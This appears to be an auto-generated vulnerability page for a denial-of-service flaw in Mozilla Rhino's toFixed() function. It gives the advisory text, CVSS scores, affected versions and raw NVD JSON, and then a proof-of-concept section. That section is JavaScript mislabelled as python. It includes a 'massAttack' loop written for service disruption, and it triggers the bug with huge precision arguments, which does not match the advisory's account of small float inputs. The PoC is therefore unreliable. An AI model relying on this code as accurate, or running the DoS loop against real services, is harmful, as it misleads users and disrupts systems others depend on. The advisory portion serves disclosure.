Security Vulnerability Report
中文
CVE-2025-66453 CVSS 7.5 HIGH

CVE-2025-66453

Published: 2025-12-03 20:16:27
Last Modified: 2026-04-14 15:39:20
Source: [email protected]

Description

Rhino is an open-source implementation of JavaScript written entirely in Java. Prior to 1.8.1, 1.7.15.1, and 1.7.14.1, when an application passed an attacker controlled float poing number into the toFixed() function, it might lead to high CPU consumption and a potential Denial of Service. Small numbers go through this call stack: NativeNumber.numTo > DToA.JS_dtostr > DToA.JS_dtoa > DToA.pow5mult where pow5mult attempts to raise 5 to a ridiculous power. This vulnerability is fixed in 1.8.1, 1.7.15.1, and 1.7.14.1.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:mozilla:rhino:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:rhino:1.7.15:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:rhino:1.8.0:*:*:*:*:*:*:* - VULNERABLE
Rhino < 1.7.14.1
Rhino < 1.7.15.1
Rhino < 1.8.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-66453 PoC - Rhino toFixed() DoS Vulnerability // Affects: Rhino < 1.7.14.1, < 1.7.15.1, < 1.8.1 // Example 1: Basic PoC function triggerDoS() { var maliciousNumber = 0.123456; // Pass extremely large value to toFixed() to trigger pow5mult with huge exponent var result = maliciousNumber.toFixed(1000000); return result; } // Example 2: Simulate attacker-controlled input scenario function simulateAttack(userInput) { var floatValue = parseFloat(userInput); if (!isNaN(floatValue)) { // Attacker can control the precision parameter var precision = parseInt(userInput.split('.')[1]) || 0; // Trigger vulnerability with large precision value return floatValue.toFixed(precision * 10000); } } // Example 3: Batch trigger for service disruption function massAttack() { for (var i = 0; i < 1000; i++) { try { (0.1).toFixed(999999); } catch (e) { // Handle potential errors but continue attack } } } // Execute PoC try { triggerDoS(); console.log('DoS triggered successfully'); } catch (e) { console.log('Error: ' + e.message); }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66453", "sourceIdentifier": "[email protected]", "published": "2025-12-03T20:16:26.897", "lastModified": "2026-04-14T15:39:20.143", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rhino is an open-source implementation of JavaScript written entirely in Java. Prior to 1.8.1, 1.7.15.1, and 1.7.14.1, when an application passed an attacker controlled float poing number into the toFixed() function, it might lead to high CPU consumption and a potential Denial of Service. Small numbers go through this call stack: NativeNumber.numTo > DToA.JS_dtostr > DToA.JS_dtoa > DToA.pow5mult where pow5mult attempts to raise 5 to a ridiculous power. This vulnerability is fixed in 1.8.1, 1.7.15.1, and 1.7.14.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:rhino:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.14.1", "matchCriteriaId": "061BECFF-1251-4087-9BF8-CA70D17D9AAD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:rhino:1.7.15:*:*:*:*:*:*:*", "matchCriteriaId": "560BC060-5CBA-4BF4-8169-9F23D27BF729"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:rhino:1.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C5E0825A-E0C9-48D8-800C-888160052EFF"}]}]}], "references": [{"url": "https://github.com/mozilla/rhino/security/advisories/GHSA-3w8q-xq97-5j7x", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.